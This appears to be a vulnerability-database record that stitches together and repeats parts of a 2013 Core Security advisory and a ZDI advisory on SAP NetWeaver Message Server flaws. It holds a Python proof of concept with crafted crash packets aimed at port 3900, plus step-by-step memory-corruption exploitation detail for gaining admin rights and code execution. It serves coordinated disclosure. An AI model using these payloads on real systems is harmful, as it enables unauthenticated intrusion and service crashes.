out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-111 June 28, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-28 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1 Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg== =FVga -----END PGP SIGNATURE-----
var-202001-0832 A Buffer Overflow vulnerability exists in the Message Server service _MsJ2EE_AddStatistics() function when sending specially crafted SAP Message Server packets to remote TCP ports 36NN and/or 39NN in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04, which could let a remote malicious user execute arbitrary code. SAP NetWeaver Contains a classic buffer overflow vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. The vulnerability is due to a memory pointer error while processing certain packets by the affected software. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 server_name = '-'+' '*39 def send_packet(sock, packet): packet = struct.pack("!I", len(packet)) + packet sock.send(packet) def receive(sock): length = sock.recv(4) (length, ) = struct.unpack("!I", length) data = "" while len(data)<length: data+= sock.recv(length) return (length, data) def initialize_connection(hostname, port): # Connect print "[*] Connecting to", hostname, "port", port connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connection.connect((hostname, port)) # Send initialization packet print "[*] Conected, sending login request" init = '**MESSAGE**\x00' # eyecatcher init+= '\x04' # version init+= '\x00' # errorno init+= client_string # toname init+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key init+= '\x01\x08' # flag / iflag (MS_LOGIN_2) init+= client_string # fromname init+= '\x00\x00' # padd send_packet(connection, init) # Receive response print "[*] Receiving login reply" (length, data) = receive(connection) # Parsing login reply server_name = data[4+64:4+64+40] return connection # Main PoC body connection = initialize_connection(options.hostname, options.port) send_attack(connection) -----/ In the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities. 8.1. Malicious packets are processed by the vulnerable function '_MsJ2EE_AddStatistics' in the 'msg_server.exe' module. The vulnerable function '_MsJ2EE_AddStatistics' receives a pointer to a 'MSJ2EE_HEADER' struct as its third parameter, which is fully controlled by the attacker. This struct type is defined as follows: /----- 00000000 MSJ2EE_HEADER struct ; (sizeof=0x28, standard type) 00000000 senderclusterid dd ? 00000004 clusterid dd ? 00000008 serviceid dd ? 0000000C groupid dd ? 00000010 nodetype db ? 00000011 db ? ; undefined 00000012 db ? ; undefined 00000013 db ? ; undefined 00000014 totallength dd ? 00000018 currentlength dd ? 0000001C currentoffset dd ? 00000020 totalblocks db ? 00000021 currentblock db ? 00000021 00000022 db ? ; undefined 00000023 db ? ; undefined 00000024 messagetype dd ? 00000028 MSJ2EE_HEADER ends -----/ The '_MsJ2EE_AddStatistics' function uses the 'serviceid' field of the 'MSJ2EE_HEADER' to calculate an index to write into the 'j2ee_stat_services' global array, without properly validating that the index is within the boundaries of the array. On the other hand, 'j2ee_stat_services' is a global array of 256 elements of type 'MSJ2EE_STAT_ELEMENT': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ This vulnerability can be used to corrupt arbitrary memory with arbitrary values, with some restrictions. The following snippet shows the vulnerable code within the '_MsJ2EE_AddStatistics' function: /----- mov edi, [ebp+pJ2eeHeader] mov eax, [edi+MSJ2EE_HEADER.serviceid] ;attacker controls MSJ2EE_HEADER.serviceid xor ecx, ecx cmp dword ptr j2ee_stat_total.totalMsgCount+4, ecx lea esi, [eax+eax*8] lea esi, j2ee_stat_services.totalMsgCount[esi*8] ;using the index without validating array bounds -----/ Since the 'serviceid' value is first multiplied by 9 and then it is multiplied by 8, the granularity of the memory addresses that can be targeted for memory corruption is 0x48 bytes, which is the size of the 'MSJ2EE_STAT_ELEMENT' struct: /----- 00000000 MSJ2EE_STAT_ELEMENT struc ; (sizeof=0x48, standard type) 00000000 ; XREF: .data:j2ee_stat_totalr 00000000 ; .data:j2ee_stat_servicesr 00000000 totalMsgCount dq ? ; XREF: _MsJ2EE_AddStatistics+1Br 00000000 ; _MsJ2EE_AddStatistics+2Fr ... 00000008 totalMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+192r 00000008 ; _MsJ2EE_AddStatistics+19Br ... 00000010 avgMsgLength dq ? ; XREF: _MsJ2EE_AddStatistics+1C2w 00000010 ; _MsJ2EE_AddStatistics+1C7w ... 00000018 maxLength dq ? ; XREF: _MsJ2EE_AddStatistics+161r 00000018 ; _MsJ2EE_AddStatistics+16Er ... 00000020 noP2PMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D442w 00000020 ; _MsJ2EE_AddStatistics+158w ... 00000028 noP2PRequest dq ? ; XREF: _MsJ2EE_AddStatistics+144w 00000028 ; _MsJ2EE_AddStatistics+14Aw ... 00000030 noP2PReply dq ? ; XREF: _MsJ2EE_AddStatistics+132w 00000030 ; _MsJ2EE_AddStatistics+138w ... 00000038 noBroadcastMessage dq ? ; XREF: _MsJ2EE_AddStatistics:loc_44D40Dw 00000038 ; _MsJ2EE_AddStatistics+123w ... 00000040 noBroadcastRequest dq ? ; XREF: _MsJ2EE_AddStatistics+10Fw 00000040 ; _MsJ2EE_AddStatistics+115w ... 00000048 MSJ2EE_STAT_ELEMENT ends -----/ However, it is possible to use different combinations of the 'flag/iflag' values in the Message Server packet to gain more precision over the memory addresses that can be corrupted. Different combinations of 'flag/iflag' values provide different memory corruption primitives, as shown below: /----- At this point: * ESI points to an arbitrary, attacker-controlled memory address * EBX == 1 .text:0044D359 movzx eax, [ebp+msiflag] .text:0044D35D sub eax, 0Ch .text:0044D360 jz short loc_44D37C .text:0044D362 sub eax, ebx .text:0044D364 jnz short loc_44D39D .text:0044D366 cmp [ebp+msflag], 2 .text:0044D36A jnz short loc_44D374 .text:0044D36C add [esi+40h], ebx ; iflag=0xd, flag=2 => add 1 to [esi+0x40] .text:0044D36F adc [esi+44h], ecx .text:0044D372 jmp short loc_44D39D .text:0044D374 ; --------------------------------------------------------------------------- .text:0044D374 .text:0044D374 loc_44D374: ; CODE XREF: _MsJ2EE_AddStatistics+7Aj .text:0044D374 add [esi+38h], ebx ; iflag=0xd, flag=1 => add 1 to [esi+0x38] .text:0044D377 adc [esi+3Ch], ecx .text:0044D37A jmp short loc_44D39D .text:0044D37C ; --------------------------------------------------------------------------- .text:0044D37C .text:0044D37C loc_44D37C: ; CODE XREF: _MsJ2EE_AddStatistics+70j .text:0044D37C mov al, [ebp+msflag] .text:0044D37F cmp al, 3 .text:0044D381 jnz short loc_44D38B .text:0044D383 add [esi+30h], ebx ; iflag=0xc, flag=3 => add 1 to [esi+0x30] .text:0044D386 adc [esi+34h], ecx .text:0044D389 jmp short loc_44D39D .text:0044D38B ; --------------------------------------------------------------------------- .text:0044D38B .text:0044D38B loc_44D38B: ; CODE XREF: _MsJ2EE_AddStatistics+91j .text:0044D38B cmp al, 2 .text:0044D38D jnz short loc_44D397 .text:0044D38F add [esi+28h], ebx ; iflag=0xc, flag=2 => add 1 to [esi+0x28] .text:0044D392 adc [esi+2Ch], ecx .text:0044D395 jmp short loc_44D39D .text:0044D397 ; --------------------------------------------------------------------------- .text:0044D397 .text:0044D397 loc_44D397: ; CODE XREF: _MsJ2EE_AddStatistics+9Dj .text:0044D397 add [esi+20h], ebx ; iflag=0xc, flag=1 => add 1 to [esi+0x20] .text:0044D39A adc [esi+24h], ecx [...] -----/ And the following code excerpt is always executed within the '_MsJ2EE_AddStatistics' function, providing two more memory corruption primitives: /----- .text:0044D3B7 add [esi], ebx ;add 1 to [esi] .text:0044D3B9 adc dword ptr [esi+4], 0 .text:0044D3BD mov eax, [edi+MSJ2EE_HEADER.totallength] ;MSJ2EE_HEADER.totallength is fully controlled by the attacker .text:0044D3C0 cdq .text:0044D3C1 add [esi+8], eax ;add an arbitrary number to [esi+8] -----/ This memory corruption vulnerability can be used by remote unauthenticated attackers to execute arbitrary code on vulnerable installations of SAP Netweaver, but it can also be abused to modify the internal state of the vulnerable service in order to gain administrative privileges within the SAP Netweaver Message Server. A client connected to the Message Server may have administrative privileges or not. The Message Server holds a structure of type 'MSADM_s' for each connected client, which contains information about that very connection. Relevant parts of the 'MSADM_s' struct type are shown below: /----- 00000000 MSADM_s struc ; (sizeof=0x538, standard type) 00000000 ; XREF: .data:dummy_clientr 00000000 client_type dd ? ; enum MS_CLIENT_TYPE 00000004 stat dd ? ; enum MS_STAT 00000008 connection_ID dd ? 0000000C status db ? 0000000D dom db ? ; XREF: MsSFillCon+3Cw 0000000E admin_allowed db ? 0000000F db ? ; undefined 00000010 name dw 40 dup(?) [...] 00000534 _padding db 4 dup(?) 00000538 MSADM_s ends -----/ The 'admin_allowed' field at offset 0x0E is a boolean value that indicates whether the connected client has administrative privileges or not. When a new client connects, the 'MsSLoginClient' function of the Message Server sets the proper value for the 'admin_allowed' field in the 'MSADM_s' struct instance associated with that client: /----- .text:004230DC loc_4230DC: ; CODE XREF: MsSLoginClient+AAAj .text:004230DC ; MsSLoginClient+B26j .text:004230DC cmp byte ptr [edi+0Eh], 0 ; privileged client? .text:004230E0 jnz short loc_4230EA ; if yes, jump .text:004230E2 mov al, byte ptr ms_admin_allowed ; otherwise, grab the value of the "ms_admin_allowed" global variable... .text:004230E7 mov [edi+0Eh], al ; ...and save it to MSADM_s.admin_allowed -----/ So if we manage to overwrite the value of the 'ms_admin_allowed' global variable with a value different than 0, then we can grant administrative privileges to our unprivileged connections. In SAP Netweaver 'msg_server.exe' v7200.70.18.23869, the 'ms_admin_allowed' global variable is located at '0x008f17f0': /----- .data:008F17F0 ; int ms_admin_allowed .data:008F17F0 ms_admin_allowed dd ? ; DATA XREF: MsSSetMonitor+7Ew .data:008F17F0 ; MsSLoginClient+B62r -----/ And the 'j2ee_stat_services' global array, which is the array that can be indexed outside its bounds, is located at '0x0090b9e0': /----- .data:0090B9E0 ; MSJ2EE_STAT_ELEMENT j2ee_stat_services[256] .data:0090B9E0 j2ee_stat_services MSJ2EE_STAT_ELEMENT 100h dup(<?>) .data:0090B9E0 ; DATA XREF: _MsJ2EE_AddStatistics+24o .data:0090B9E0 ; _MsJ2EE_AddStatistics+4Co ... -----/ So, by providing 'MSJ2EE_HEADER.serviceid == 0x038E3315', we will be targeting '0x008F17C8' as the base address for memory corruption. Having in mind the different memory corruption primitives based on combinations of 'flag/iflag' fields described above, by specifying 'iflag == 0xC' and 'flag == 0x2' in our Message Server packet we will be able to add 1 to '[0x008F17C8+0x28]', effectively overwriting the contents of '0x008F17F0' ('ms_admin_allowed'). After overwriting 'ms_admin_allowed', all of our future connections will have administrative privileges within the Message Server. After gaining administrative privileges for our future connections, there are at least two possible paths of exploitation: 1. Of course it is not mandatory to have administrative privileges in order to overwrite function pointers, but considering the limitation of targetable addresses imposed by the little granularity of the memory corruption, some of the most handy-to-exploit function pointers happened to be accessible just for administrative connections. 2. Modify the configuration and behavior of the server. That includes changing Message Server's runtime parameters and enabling Monitor Mode in the affected server. 8.1.1. *Gaining remote code execution by overwriting function pointers* Having in mind that the granularity of the memory addresses that can be targeted for memory corruption is not that flexible (0x48 bytes) and the limited memory corruption primitives available, it takes some effort to find a function pointer that can be overwritten with a useful value and which can be later triggered with a network packet. One possibility is to overwrite one of the function pointers which are in charge of handling the modification of Message Server parameters: /----- .data:0087DED0 ; SHMPRF_CHANGEABLE_PARAMETER ms_changeable_parameter[58] ; function pointers associated to the modification of the "ms/max_sleep" parameter .data:0087DED0 ms_changeable_parameter SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_sleep, \ .data:0087DED0 offset MsSTestInteger, \ ; "rdisp/TRACE_PATTERN_2" .data:0087DED0 offset MsSSetMaxSleep> ; function pointers associated to the modification of the "ms/max_vhost" parameter .data:0087DED0 SHMPRF_CHANGEABLE_PARAMETER <offset aMsMax_vhost, \ .data:0087DED0 offset MsSTestInteger, \ ;<-- we can overwrite this one .data:0087DED0 offset MsSSetMaxVirtHost> [...] -----/ By providing 'MSJ2EE_HEADER.serviceid == 0x038E1967' we can target '0x0087DED8' as the base address for memory corruption. In this case we can use the memory corruption primitive at address '0x0044D3C1' that always gets executed, which will allow us to add an arbitrary number (the value of 'MSJ2EE_HEADER.totallength') to '[0x0087DED8+8]' effectively overwriting the function pointer shown above ('ms_changeable_parameter[1].set'). After that we need to send a 'MS_SET_PROPERTY' request, specifying 'ms/max_vhost' as the name of the property to be changed. This 'MS_SET_PROPERTY' packet will make our overwritten function pointer to be called from the 'MsSChangeParam' function: /----- .text:00404DB3 loc_404DB3: ; CODE XREF: MsSChangeParam+CDj .text:00404DB3 lea esi, [edi+edi*2] .text:00404DB6 mov edi, [ebp+pvalue] .text:00404DB9 add esi, esi .text:00404DBB mov edx, ms_changeable_parameter.test[esi+esi] .text:00404DC2 add esi, esi .text:00404DC4 push edi .text:00404DC5 push pname .text:00404DC6 call edx ; call our overwritten function pointer -----/ 'MS_SET_PROPERTY' packets will be ignored by the Message Server if the requesting client does not have administrative privileges, so it is necessary to gain administrative privileges as explained above before using the memory corruption vulnerability to overwrite one of the function pointers in the 'ms_changeable_parameter' global array. 8.1.2. *Modify the configuration and behavior of the server* After gaining administrative privileges for our connections, it is possible to perform 'MS_SET_PROPERTY' packets against the Message Server in order to modify its configuration and behavior. That makes possible, for example, to add virtual hosts to the load balancer, or to enable Monitor Mode [3] (transaction SMMS) on the affected server. Enabling Monitor Mode takes two steps: 1. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/monitor"', property 'value == 1'. 2. Send a 'MS_SET_PROPERTY' packet with property 'name == "ms/admin_port"', property 'value == 3535' (or any other arbitrary port number). After sending the second 'MS_SET_PROPERTY' packet, the SAP Netweaver Message Server will start listening on the specified port, waiting for connections from instances of the msmon.exe monitoring program [4]. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x0d' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "ABCDEFGH"+"\x01\x00\x00\x00"+"MNOPQRSTUVWXYZ0123"+"\x01"+"56789abcd" crash+= "\x00\x00\x00\x01" crash+= "\xff\xff\xff\xff" crash+= "\x00\x00\x00\x00" send_packet(connection, crash) print "[*] Crash sent !" -----/ 8.2. Malicious packets are processed by the vulnerable function 'WRITE_C' in the 'msg_server.exe' module. The following python code can be used to trigger the vulnerability: /----- def send_attack(connection): print "[*] Sending crash packet" crash = '**MESSAGE**\x00' # eyecatcher crash+= '\x04' # version crash+= '\x00' # errorno crash+= server_name # toname crash+= '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' # msgtype/reserved/key crash+= '\x04\x05' # flag/iflag crash+= client_string # fromname crash+= '\x00\x00' # padd crash+= "AD-EYECATCH\x00" crash+= "\x01\x01" crash+= "%11d" % 104 crash+= "%11d" % 1 crash+= "\x15\x00\x00\x00" crash+= "\x20\x00\x00\xc8" crash+= "LALA" + ' '*(20-4) crash+= "LOLO" + ' '*(40-4) crash+= " "*36 send_packet(connection, crash) print "[*] Crash sent !" -----/ 9. *Report Timeline* . 2012-12-10: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for January 22nd, 2013. 2012-12-10: Core sends an advisory draft with technical details and a PoC. 2012-12-11: The SAP team confirms the reception of the issue. 2012-12-21: SAP notifies that they concluded the analysis of the reported issues and confirms two out of the five vulnerabilities. Vendor also notifies that the other three reported issues were already fixed in February, 2012. Vendor also notifies that the necessary code changes are being done and extensive tests will follow. The corresponding security note and patches are planned to be released on the Security Patch Day in Feb 12th 2013. 2012-12-21: Core re-schedules the advisory publication for Feb 12th, 2013. 2012-12-28: SAP notifies Core that they will be contacted if tests fails in order to re-schedule the advisory publication. 2013-01-22: First release date missed. 2013-01-28: SAP notifies that they are still confident with releasing a security note and patches on Feb 12th as planned. 2013-01-29: Core acknowledges receiving the information and notifies that everything is ready for public disclosing on Feb 12th. Core also asks additional information regarding the patched vulnerabilities mentioned in [2012-12-21], including links to security bulletin, CVEs, and patches in order to verify if those patches effectively fix the reported flaws. 2013-02-01: SAP notifies that the patched vulnerabilities mentioned in [2012-12-21] were reported in [5] and no CVE were assigned to them. Those vulnerabilities seems to be related to ZDI advisories [6], [7], [8]. 2013-02-06: Core notifies that the patched vulnerabilities will be removed from the advisory and asks additional information regarding the affected and patched version numbers. 2013-02-01: SAP notifies that the security note 1800603 will be released and that note will provide further information regarting this vulnerability. 2013-02-13: Advisory CORE-2012-1128 published. 10. *References* [1] http://www.sap.com/platform/netweaver/index.epx. [2] SAP Security note Feb 2013 https://service.sap.com/sap/support/notes/1800603. [3] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/bdc344cc104231e10000000a421937/content.htm. [4] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/c2e782b8fd3020e10000000a42189d/frameset.htm. [5] SAP Security notes Feb 2012 https//service.sap.com/sap/support/notes/1649840. [6] http://www.zerodayinitiative.com/advisories/ZDI-12-104/. [7] http://www.zerodayinitiative.com/advisories/ZDI-12-111/. [8] http://www.zerodayinitiative.com/advisories/ZDI-12-112/. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ZDI-12-111 : SAP Netweaver ABAP msg_server.exe Opcode 0x43 Remote Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-12-111 June 28, 2012 - -- CVE ID: - -- CVSS: 10, AV:N/AC:L/Au:N/C:C/I:C/A:C - -- Affected Vendors: SAP - -- Affected Products: SAP NetWeaver - -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 12407. - -- Vendor Response: SAP has issued an update to correct this vulnerability. More details can be found at: http://www.sdn.sap.com/irj/sdn/index?rid=/webcontent/uuid/c05604f6-4eb3-2d1 0-eea7-ceb666083a6a#section40 - -- Disclosure Timeline: 2011-10-28 - Vulnerability reported to vendor 2012-06-28 - Coordinated public release of advisory - -- Credit: This vulnerability was discovered by: * e6af8de8b1d4b2b6d5ba2610cbf9cd38 - -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ Follow the ZDI on Twitter: http://twitter.com/thezdi -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 10.2.0 (Build 1950) Charset: utf-8 wsBVAwUBT+yszFVtgMGTo1scAQLv/wf+MRiEiaRsMyaVgI7MTDUo9sXprBObQ6QM yIlVyGLjwEQrO9KsUMlCj/pfLkgjcHYpCNxcrB0+6ZgtphkIQhrB3w0sj/fjRyn1 Vuugvjazu8xffqujZ2ymaQHR+toaQjeKrtWvVbaTdJI6EFuUi+qT5MrZQfRWhE2X uqXdLphMXYH+SRhNtD+zJhxg4U4emVvirqNJa9YLwFE0UpxGRksKCB4Cx89o2QWE NiC9bPznAVCMOBh/R/8uROXkg1Jg9YBhEu7wzJY95Yfsl4oWpSO0cQOCF0WAWiHi TsUy3xHAjW7gMz7v/QMleok6C/7safK/7qjJRMDrGUQO1csmlZUkAg== =FVga -----END PGP SIGNATURE-----
var-201208-0222 Multiple stack-based buffer overflows in msg_server.exe in SAP NetWeaver ABAP 7.x allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a (1) long parameter value, (2) crafted string size field, or (3) long Parameter Name string in a package with opcode 0x43 and sub opcode 0x4 to TCP port 3900. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. NetWeaver ABAP is prone to a denial-of-service vulnerability
